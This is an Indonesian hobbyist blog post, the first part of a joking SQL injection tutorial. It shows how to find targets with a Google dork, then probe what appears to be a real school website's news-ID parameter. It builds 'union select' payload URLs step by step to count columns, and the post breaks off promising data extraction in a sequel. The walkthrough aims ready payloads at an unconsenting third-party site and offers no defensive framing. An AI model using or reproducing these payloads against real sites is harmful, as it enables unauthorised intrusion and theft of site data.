Who Am I???

Don't Hesitate To Win Some or Learn Some...

02 Juni 2010

Simple SQL

Wellcome friend…

Ini pertama kalinya saya mencoba untuk menulis dalam sebuah blog,jadi kalo masih banyak kekurangan jangan gebugin saya..tapi kalo ada kelebihan, silahkan donate ke rekening saya…:P

Pertama saya akan mencoba menjelaskan tentang SQL injection,tapi cuma dikit aja maslahnya belum ada yg donate sich…J

Kalo master² mau nambahin silahkan….

Kalo temen² mau kasih comment, boleh aja tapi donate dulu…xixixiixxi

Ok,langsung aja degh…

1. About Sql Injection

Sql Injection merupakan trik untuk menyuntikan air uang(translated)..hihihi salah.maksudnya menyuntikan Permintaan SQL / perintah sebagai masukan yg memungkin melalui halaman web ataupun melalui url.

Singkat kan??makanya donate,biar saya punya cukup uang buat makan dan cukup tenaga buat ngetik…xixixixi. Ujung²nya suruh donate juga…J

2. Apa yg di butuhkan?

3 Kg tepung imajinasi, 1,5 Kg kreatifitas, 800 gram logika, 400 gram kesabaran.

Dan yg paling penting harus ada koneksi internet dan web browser apapun. Dan jangan lupa juga 2 bungkus mallboro mix dan 1 botol bir.J

3. Apa yg harus kita cari??

Pertama kita cari warnet yg murah dulu ( bagi yg blom punya laptop,like me ),,trus cari tempat yg nyaman,ga terlalu dingin dan ga terlalu panas,,trus bubu aja disitu..hehehe..bcandanya maksa,,ga lucu geto loch…

Harap maklum..lagi kelaperan nih…

Udah mulai serius nih,udah adzan subuh..xixixi ga ada hubungannya..

Kita cari target di google dengan dork apa aja sesuka hati.

Missal: site:com cilacap

Artinya kita mencari web .com dan yg mengandung kata cilacap.

Missal kita dapet http://sman1clp.com

Kita cari id nya http://sman1clp.com/index.php?cat=berita&idberita=50

Selanjutnya kita cek web tersebut vulner atau gak..

Caranya kita kasih tanda – di depan angka id nya.

Jadi http://sman1clp.com/index.php?cat=berita&idberita=-50

Apa yg terjadi??blank…

Yup, jika kita masukan – didepan angka id dan web menjadi blank atau keluar pesan eror,itu artinya web tersebut vulner.

Selanjutnya kita cari binery nya. Caranya dengan perintah union select.

http://sman1clp.com/index.php?cat=berita&idberita=-50+union+select+1--

tanda + adalah string Sql yg berarti spasi.sama saja dengan %20. dan -– juga bisa diganti dengan /* untuk lebih jelasnya tentan g-string² SQL, Tanya mbah google.

Ok,kembali ke tanktop..

Setelah kita masukin union select, apa yg terjadi??

The used SELECT statements have a different number of columns

Kita tambahkan binerynya

http://sman1clp.com/index.php?cat=berita&idberita=-50+union+select+1,2--

ternyata masih The used SELECT statements have a different number of columns

tambahkan lagi sampe true dan ga kluar lagi pesan tsb.

Ok, kita dapet

http://sman1clp.com/index.php?cat=berita&idberita=-50+union+select+1,2,3,4,5,6,7--

3

Pengirim : 2, [ 6]


5

ada apa dengan angka² tersebut????
Temukan jawabannya di Tutor SQL Part 2 hehehehehhehe..
Hacked By
About Me: 

0 No COmment:

Poskan Komentar

Langgan: Poskan Komentar (Atom)